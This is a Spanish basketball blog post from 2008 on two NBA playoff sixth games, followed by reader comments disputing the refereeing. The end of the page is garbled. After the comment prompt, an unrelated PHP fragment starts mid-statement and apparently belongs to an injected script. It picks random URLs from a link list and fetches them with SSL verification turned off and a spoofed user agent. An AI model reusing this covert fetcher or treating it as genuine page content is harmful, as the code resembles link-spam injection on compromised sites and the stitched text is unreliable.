Sextos partidos

17 de May de 2008 por Viva_Dirk

by Viva_Dirk & TheDeerHunter

Se acabó el viento (LAL 108 – UTA 105)

Anoche finalizó esta espectacular eliminatoria donde pocos confiaban que terminase, en casa de Utah con victoria visitante. Pero ayer se dio la variante que apuntábamos como clave hace unos días, el viento de los silbatos dejó de ir tan a favor de los de Sloan y se quedó en un típico arbitraje de play-offs. Quizá si eso hubiese pasado antes este partido no habría tenido lugar, pero pasó ayer y durante 3 cuartos los Lakers dominaron absolutamente el partido.

El partido se inició con un gran arranque por parte de Lakers, mucho más seguros de sí mismos que los Jazz. Los titulares y Vujacic han aportado en ataque y Pau y Fisher han liderado la defensa mientras Kobe marcaba el ritmo del partido. Así, y con unos Jazz sorprendentemente blandos en defensa, los Lakers lograron una renta superior a 10 puntos a los pocos minutos. Con Boozer y Okur desaparecidos, Deron hizo todo lo posible por mantener a su equipo en el partido, pero los visitantes continuaron haciendo bien las cosas y se fueron a los vestuarios con una renta de 19 puntos. La segunda parte comenzó plácida para los anglinos con buenas defensas y ataques sencillos. La defensa sobre Boozer rozaba la perfección y (oh milagro) se cerraba el rebote. El tercer cuarto transcurría con triples de Okur, penetraciones de Deron y mates de Brewer para los locales y una anotación repartida para los Lakers, todo esto con una ventaja constante de +15 para los discípulos de Phil Jackson.

El último períod empezó marcado por la 5ª falta personal de Boozer, que aun así no fue reemplazado por Sloan, y sobre todo por la aparición de Paul Millsap con 8 puntos consecutivos y rebotes de todos los colores, cosa que sirvió para que la afición de Utah despertase mientras los Lakers anotaban 7 puntos en 7 minutos. Kobe no habia anotado ninguna canasta en juego en los últimos cuartos de los dos anteriores partidos y la ventaja quedaba por primera vez en mucho tiempo por debajo de 10. Entonces sucedió. Tras dos faltas suyas consecutivas, el 24 de la calle Figueroa cogió el balón y clavo un tremendo triple en la cara de Matt Harpring. Y si tremendo fue el triple, me quedo sin palabras para describir el posterior 2+1 desde 6 metros que ponía a los Lakers pasadas las 7 de la mañana hora española con 13 de ventaja, y a un servidor dando botes en el salón. Pero rendirse no entraba en los planes de los Jazz y después de esa jugada llegaron 17 puntos de los mormones en 4 minutos y medio, con 5 triples incluídos. A falta de 15 segundos los Lakers habian visto reducida su ventaja a 2 puntos, y donde unos segundos antes Lamar Odom había anotado dos tiros libres, no podía fallar el MVP, y no lo hizo, pero si lo haría a falta de 12 segundos Derek Fisher, dejando a los Jazz a tiro de triple, triple que no consiguieron ni Okur ni Deron.

Ha sido una serie apasionante, con juego vistoso, acciones para el recuerdo, golpes y sobre todo emoción. ¡¡¡¡¡Que vivan los play-offs!!!!!

Durmiendo fuera de casa (BOS 69 – CLE 74)

Es extraño. No existe una explicación clara de ciertas cosas. Una parte sí, porque Bavetta y el resto no dan demasiadas concesiones a las aficiones visitantes, ni siquiera cuando visten de verde trébol. A partir de ahí, llámale indolencia, llámale relajación, llámale desconcentración o peor… llámale miedo. No es normal presenciar una descomposición súbita colectiva de la magnitud de las que estamos presenciando en según qué equipos durante esta segunda ronda. En particular, Boston está logrando alcanzar unas cotas de incapacidad tan sorprendentes como ya tristemente habituales. Anoche 69 “meritorios” puntos.

Se puede pensar que puede ser producto de la gran defensa de su rival, en este caso Cleveland, aunque ya es sospechoso que hayan mostrado la misma imagen contra dos equipos distintos. Efectivamente en el Este se defiende muy duro pero muchas de las canastas que se han fallado en esta eliminatoria no tenían cerca defensor alguno. 30% en tiros de campo es lamentable para un candidato al título pero si se convierte en habitual va aun más allá de lo lamentable. Ray Allen y Rajon Rondo han logrado adquirir la invisibilidad como poder mutante fuera de casa. Pierce tiene que lidiar con Lebrón y está fallando muchísimo. Del resto del equipo sólo de Big Tickett se espera algo positivo y él está respondiendo como ha podido pero, ¿dónde están esos refuerzos de mitad de temporada? ¿ni un minuto Sam Cassell?? Es difícil entender todo lo que les pasa.

Cleveland no se puede decir que esté haciendo las series de su vida. Lebron no ha estado precísamente fino y de sus compañeros tampoco es que hayamos podido disfrutar de actuaciones precísamente sobresalientes. Anoche ni siquiera tenían a Gibson, lesionado. Este equipo no son los Hawks. Ya han vivido alguna situación límite en el pasado y El Elegido no estará demasiado dispuesto a dejarse avasallar en el partido decisivo. A priori da la impresión que será más difícil que la otra vez.

Esta vez ya no es una sorpresa. Ha vuelto ha suceder y los Celtics vuelven al mismo escenario en el que se jugaron la vida hace no tanto de lo que parece. Los títulos colgados, las camisetas de Bird, Russell y compañía juzgándolos implacablemente otra vez más. Su favoritismo en juego. ¿Estarán tensionados o ya se habrán acostumbrado a la situación?

Comenta

22 comentarios a esta entrada

  1. Jabho dice:
    #1

    Sois unos cachondos…. resulta que el arbitraje está siendo favorable a los Jazz y por eso van al 6º partido… lo dicho, unos cachondos.

    Muy bien Lakers. En ataque son muy buenos y cuando les funciona la defensa y sobre todo cerrar el rebote la cosa esta hecha. El único pero es la falta de rotación interior pero bueno, eso por mala suerte (o buena si no eres amarillo 🙂 )

    En cuanto a Boston pues si mal, pero con matizes. Para mi esta es la final del Este. Detroit ha hecho bien su trabajo entre otras cosas porque Orlando ha estado mal (que contra Sixers sufrieron mas de la cuenta), pero Cleveland me parece un equipo muy dificil de batir. Defiende muy fuerte y cuando estan inspirados los lebroncitos es complicado ganar. El propio Lebron es hoy por hoy el jugador mas desequilibrante de la liga… Hay que recuperar a Ray Allen y quitarse algo de tensión…. pinta complicado pero quién esperaba una serie sencilla contra Cleveland?

      Citar

  2. TheDeerHunter dice:
    #2

    Viva, el que describas tus saltos en el salón cuando kobe mete un 2+1 de genio no ayuda para que luego nuestro amigo de SA nos acuse de no ser objetivos con el tema del arbitraje ;D

    Cleveland será un equipo difícil de batir. Pero los Hawks también lo eran… ¿Orlando muy mal, con dos partidos resueltos en el último segundo?? ¿ muy mal Suns?? ¿ muy mal Utah???
    Si todos estuvimos de acuerdo con que una de las claves a favor de Boston o Detroit sería la batalla del oeste, no creemos que esta sea la mejor manera de aprovechar esa ventaja.

    A priori Boston es favorito contra casi cualquiera (en mi opinión menos contra SA y Det) Si te parece normal que un favorito meta 69 anoche y alrededor de eso en la mayoría de los partidos por muy bien que defiendan sus rivales (¿todos?)
    Es más que posible que pase Boston. Si no lo logran la hecatombe. Si lo logran es lo que se les supone deben hacer, pero indiscutiblemente han perdido muchos números como favorito…

      Citar

  3. xapa_croack dice:
    #3

    Joer parece que se ve que los colores se sobreponen en el texto. Hubiera sido mas apropiado ponerlo en un articulo de opinion que en la cronica del partido.

    Vaya y el arbritaje ayer fue claramente amarillo, hasta loncar y carni que son amarillos dijeron k era prolakers.

      Citar

  4. Viva_Dirk dice:
    #4

    Carnicero a ver si no flipa con cada canasta que anota cualquiera, y ambos tienen que aprender como funciona la NBA, que el otro dia hablaban de que a D’Antoni le encantaba Calderon y que por dinero no iba a ser en NY, como si esto fuese futbol. Ah! Y Loncar es de San Antonio, con los cuales utiliza su eterna frase de ‘hacer las cosas para el equipo’.

    El arbitraje fue como el del 5º partido en LA en cuanto a caserismo o no caserismo, los Lakers ganaron y los Jazzs perdieron.

      Citar

  5. Red dice:
    #5

    Carbicero sobreactúa! XD

      Citar

  6. Red dice:
    #6

    Carnicero coño…

      Citar

  7. aro_pasado_no_newtoniano dice:
    #7

    ¿Del partido de Boston nadie comenta nada?

    No sé si bien LA o mal Utah, pero gran partido. Lo de que los reyes magos existen, de traca. Muy decepcionante Boozer,,aunque igual no debemos esperar más.

    Gran eliminatoria,,sí señór. Carnicero sobreactúa, y lo de Loncar no se entiende mucho.

      Citar

  8. TheDeerHunter dice:
    #8

    ¿qué se puede comentar de 69 puntos???

    Esta noche veremos qué significa todo esto. Si ganan, significa poco y esperaremos a ver qué tal se lo pasan contra detroit… si pierden, les haremos un bonito articulo de despedida y nos pondremos a hablar de Lebron.

      Citar

  9. MagicJohnson32 dice:
    #9

    Sobre arbitrajes… vaya falta en ataque le pitan a Pierce sobre LeBron a 50 segundos para el final. De juzgado de guardia.

    Xapa ¿desde cuando Carnicero y Loncar son amarillos?

    Y sobre todo ¿qué decisiones favorecieron a los Lakers?

      Citar

  10. aro_pasado_no_newtoniano dice:
    #10

    No sé cuando se produjo la infección, supongo que tendrá que ver con PAU. De hecho me gustaría haber medido los decibelios de los comentarios de Carnicero y Loncar ante el mismo tipo de canasta en la misma situación de Lakers y de Utah. Pero no lo hice, y entiendo el diferencial decibélico. Supongo que pobre de áquel seguidor de Lakers turco viendo partidos a través de su tele.

    Lo de las decisiones,,,pues yo no recuerdo,,pero incluso ellos (los comentaristas) que no tienen pinta de haber ido con Utah en ningún momento dijeron que se habían pasado en algunas decisiones (favoreciendo a LA). Tampoco esto es matemático, pero mi recuero es ése, ni lo esgrimo para justificar la victoria de nadie.

      Citar

  11. MagicJohnson32 dice:
    #11

    No lo sé, no escucho a Carnicero y Loncar, me pongo a los yankees (por cierto, Hubbie Brown es un gran comentarista), pero es que los fans de los Jazz se quejan del arbitraje y hablan de conspiración por parte de Stern, pero nadie me sabe decir en qué decisiones se reflejó.

      Citar

  12. xapa_croack dice:
    #12

    magic o son lakerianos o en esta seria estaba en contra de utah, pero todo se veia desde la optica lakeriana.

      Citar

  13. MagicJohnson32 dice:
    #13

    ¿Se veía desde la óptica lakeriana y dijeron que los árbitros habían beneficiado a los Lakers?

    Pues entonces no sé qué óptica tendrían los de la ESPN, que no dijeron nada…

    Que yo recuerde, las dos decisiones más dudosas son dos faltas en ataque seguidas que le pitan a los Lakers durante la remontada de los Jazz, ambas en acciones sin balón, una a Turiaf en un bloqueo ciego y otra a Bryant cuando luchaba en el poste con Harpring por la posición.

      Citar

  14. TheDeerHunter dice:
    #14

    Yo no he visto el resto de partidos por Digital+ (los he visto por otros canales)

    En el último, sobre los comentarios de Carnicero&Loncar hubo una psicosis sobre el supuesto arbitraje a favor de L.A.
    El caso es que primero disparaban y luego callaban… y eso es muy significativo. Ejemplos que me vienen a la cabeza, la falta al triple de Fisher al final de la primera parte (que luego vieron que era falta, aunque con la boca pequeña) y la falta en ataque de Boozer cuando lo eliminaron (q

      Citar

  15. TheDeerHunter dice:
    #15

    … (le he dado al intro sin querer)
    En varios de esos casos se demostró que su apreciación primaria habia estado equivocada, pero ellos aún así siguieron con el run-run del supuesto robo a favor de L.A.

    Lo único que yo vi es que los árbitros son muy malos y que, por suerte para los amarillos, en este caso los errores se han repartido (no como en la mayoría de los partidos que he visto en estos playoffs) Lo comparo (y no soy el único) con el arbitraje del 5º… pero he visto todos los partidos y ni de lejos los Angeles han salido favorecidos.
    Que alguien me diga el donde y el como. Es muy fácil hacer ese tipo de comentarios y mucho más difícil demostrarlos. Al contrario sería más fácil, os lo aseguro.

      Citar

  16. Gallis dice:
    #16

    El primer y el segundo partido tuvo un arbitraje casero. El tercero y el cuarto también. El quinto y el sexto fueron arbitrajes equilibrados (lo que pedí a los reyes magos)…y ahí ganó el mejor. Por poco, porque ambos son grandes equipos, pero ahora mismo uno es mejor que otro…Y ya que ponemos ejemplos, si alguien me dice que en el último tiro de Pau, Okur no le hace 2 faltas y media que se fueron al limbo, ese si que es un cachondo…

    Ahora bien, lo que ya es de traca es poner las opiniones de Carnicero y Loncar como ejemplo de algo, juas, juas, juas…por dios, si Loncar llegó a decir en el primer cuarto que Vujacic no estaba preparado para los Playoffs y en el cuarto dijo que cada partido crecia más y era importantísimo para LA, jojojojo…pero como ya he dicho en el foro, con lo bonita q

      Citar

  17. Gallis dice:
    #17

    (yo también le ha dado al intro, jeje)

    …con lo bonita que es la película, ahora no van a venir los hechos a jodernosla, juas, juas…

    Ah! y eso de que Detroit es más fácil que Cleveland no lo discuto, porque tengo dudas, pero vamos, también se dijo que Boston iba a tener menos problemas con Cleveland que con Atlanta y no lo parece, jeje. Lo que Boston debería hacer de una vez es ganar un partido fuera de casa, porque a partir de ahora no sé si el “factor Garden” será suficiente…

      Citar

  18. aro_pasado_no_newtoniano dice:
    #18

    Señores lakerianos, lo que ustedes digan, la perrica con toda la virulencia para ustedes. La verdad absoluta debe ser amarilla y el resto del mundo vivimos cegados por el odio antilaker.

    Como son unos chapuzas Carni & Loncar, está claro que no tienen color. Está claro, es una teoría universal, indiscutible e incuestionable.

    PD: sin poner ni un jo,jo, ni un juas, juas. jeje.

      Citar

  19. TheDeerHunter dice:
    #19

    Sasto, my friend… veo que lo vas pillando 😀

      Citar

  20. Olafur dice:
    #20

    Jojojo lo de la primera parte sobretodo en cuanto a arbitraje fue de juzgado de guardia, lo que no quita para que los Jazz perdieran solitos el partido, encabezados como casi toda la serie por Boozer

      Citar

  21. TheDeerHunter dice:
    #21

    Fuera de coñas. Tratemos de ser positivos en el debate.
    Magic preguntaba qué jugadas os parecieron más sangrantes a la hora de insinuar el robo a favor de L.A.
    Si las comentáis quizás podamos llegar a entender porqué lo decís. Yo os aseguro que no lo vi, sólo vi arbitros muy malos que fallaban más que una escopeta de feria hacia cualquiera de los dos lados… pero no puedo ser objetivo, los siento.

      Citar

  22. Gallis dice:
    #22

    Olvidate Deer, si es que no va de eso…

    Los arbitrajes están siendo iguales en todas las eliminatorias, pero solo se habla de una…esto es como lo de jugar bien o mal. Kobe hizo una pésima prorroga y veintitantos comentarios…Pierce, Billups, Lebron, Paul, Duncan, Ray Allen, etc, etc, han hecho partidos igual de lamentables o peores que esa prorroga y aquí no ha pasado nada, jeje…

    Es lo que hay. Cuanto antes nos demos cuenta los encantadores de serpientes de que Boston, Detroit y SA están ahí por méritos propios y los Lakers gracias a una conspiración judeomasónica, más felices seremos todos…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>